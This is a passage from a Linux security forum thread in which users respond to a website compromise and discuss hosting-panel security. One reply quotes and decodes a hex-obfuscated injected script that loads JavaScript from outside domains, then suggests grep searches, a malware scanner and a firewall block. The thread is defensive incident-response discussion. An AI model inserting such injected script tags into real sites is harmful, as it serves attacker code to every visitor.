LinuxQuestions.org
Visit Jeremy's Blog.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 04-27-2017, 10:39 AM   #16
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled

Quote:
Originally Posted by iLinux85 View Post
Code:
\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6A\x75\x72\x74\x79\x2E\x6D\x6C\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6A\x75\x72\x74\x79\x6D\x2E\x63\x66\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
Code:
<script type="text/javascript" src="//jurty.ml"></script>","write","<script src="//jurtym.cf"></script>
says http://ddecode.com/hexdecoder/?resul...ad22e7c0a40301

May not be helpful to the current situation, or offer any light on how they "got there".
If it were me, I'd be grepping
Code:
grep "var _0x5264" /path/to/DocumentRoot/ -Rl > /path/to/file.rpt
and examine the file.rpt file for the list of "suspect files" to further examine.
Additionally, those suspects should also contain a dual portion of "document[_0x5264" in each examined file.

Take it one DocumentRoot at a time.
Linux Maldware Detect (LMD) may be able to provide some additional information.
It has other criteria that it utilizes for analysis, and hooks nicely with clamAV,

LMD Install
Code:
cd /usr/src/
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -xzf maldetect-current.tar.gz
cd maldetect-*
sh ./install.sh
# Done. Run
maldet -d -u && maldet -a /var/www/html/
and read the report that follows the run.

See section labeled "Configuring Linux Malware Detect"
and authoritative reference is https://www.rfxn.com/projects/linux-malware-detect/

At the firewall, If it were me, I'd issue
Code:
iptables -I INPUT -s 193.105.240.0/24 -j REJECT --reject-with icmp-host-unreachable
for the host provider of jurty.ml
 
1 members found this post helpful.
Old 05-02-2017, 07:55 AM   #17
vincix
Senior Member
 
Registered: Feb 2011
Distribution: Ubuntu, Centos
Posts: 1,240

Rep: Reputation: 103Reputation: 103
@sundialsvcs
I'm impressed by your fetishism. Of course I'm being slightly ironic, but I'm also honestly impressed, of course. The question though, lingers, and that is: how do you actually replace what cpanel does? What if you have 1000 clients that need direct access to the management of sql, dns, e-mail, maybe installing wordpress, etc.? What practical solution would you actually suggest? I honestly like being paranoid about security and I like the idea of locking everything, allowing the strictly necessary access. But what do you actually do when you want provide for so many clients? Custom scripts for everything?

Last edited by vincix; 05-02-2017 at 07:59 AM.
 
Old 05-02-2017, 08:29 AM   #18
hydrurga
LQ Guru
 
Registered: Nov 2008
Location: Pictland
Distribution: Linux Mint 21 MATE
Posts: 8,048
Blog Entries: 5

Rep: Reputation: 2925Reputation: 2925Reputation: 2925Reputation: 2925Reputation: 2925Reputation: 2925Reputation: 2925Reputation: 2925Reputation: 2925Reputation: 2925Reputation: 2925
Quote:
Originally Posted by Habitual View Post
Linux Maldware Detect (LMD) may be able to provide some additional information.
It has other criteria that it utilizes for analysis, and hooks nicely with clamAV
I hadn't heard of this. Thanks Habitual.
 
Old 05-02-2017, 08:52 AM   #19
sundialsvcs
LQ Guru
 
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 10,659
Blog Entries: 4

Rep: Reputation: 3941Reputation: 3941Reputation: 3941Reputation: 3941Reputation: 3941Reputation: 3941Reputation: 3941Reputation: 3941Reputation: 3941Reputation: 3941Reputation: 3941
Quote:
Originally Posted by vincix View Post
@sundialsvcs
I'm impressed by your fetishism. Of course I'm being slightly ironic, but I'm also honestly impressed, of course. The question though, lingers, and that is: how do you actually replace what cpanel does? What if you have 1000 clients that need direct access to the management of sql, dns, e-mail, maybe installing wordpress, etc.? What practical solution would you actually suggest? I honestly like being paranoid about security and I like the idea of locking everything, allowing the strictly necessary access. But what do you actually do when you want provide for so many clients? Custom scripts for everything?
There are a variety of ways to provision a remote server – even hundreds of them. Most of these techniques involve cloning identical copies of a server configuration that has been (hand-)built ahead of time.

For instance, Canonical's MAAS ("Metal As A Service") tool is just one of a great many tools in this class.

The most critical aspect of this – which is also the failure point of the tools that you mention – is that access to the remote administration interfaces must be secure. Even if they are based on the use of HTTP management-clients for convenience, the privileged daemons that perform the work are not based on Apache and cannot be reached from the outside world. Strong, certificate based, security, including peer-identification, is essential. To "break in" to the thing must be an impossibility. "Apache" has no power whatsoever to do anything, and the secure management interfaces cannot be reached "from web pages" on "web servers."

Security in-general is also crucial. ("ssh" won't do the trick!!) For instance, to reach the administrative interfaces of any web-sites or servers that I'm responsible for, there's only one outer-bastion defense that you must cross: OpenVPN, with tls-auth. And basically this means that you possess a non-revoked certificate, of which there are exactly three in this world. Every administrative daemon listens only to this secure "tunnel." No other path exists(!), and, unless you possess the tls-auth certificate, it is impossible to detect(!!) it. So, that's the first line of defense: a secure but secret door in a smooth and featureless wall, that only three people on Earth (at the present time) are able to discover or enter, through the use of unique credentials assigned only to them.

Last edited by sundialsvcs; 05-02-2017 at 01:21 PM.
 
Old 05-02-2017, 09:17 AM   #20
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
Quote:
Originally Posted by hydrurga View Post
I hadn't heard of this. Thanks Habitual.
What I don't know could fill a warehouse.
What I do know could fill an outhouse.
The thanks belong to ryan (at) rfxn.com

Peace.

Last edited by Habitual; 05-02-2017 at 09:22 AM.
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
malware code injection ondraasek Linux - Security 8 04-28-2016 06:45 AM
SQL Injection attack against my server sneakyimp Linux - Security 22 12-10-2015 08:03 AM
How to remove script injection from .php and .html files spithakos Linux - Security 14 09-22-2011 03:11 PM
Dynamic javascript injection - Malware kentsbest Linux - Security 4 08-04-2007 10:53 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 01:41 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration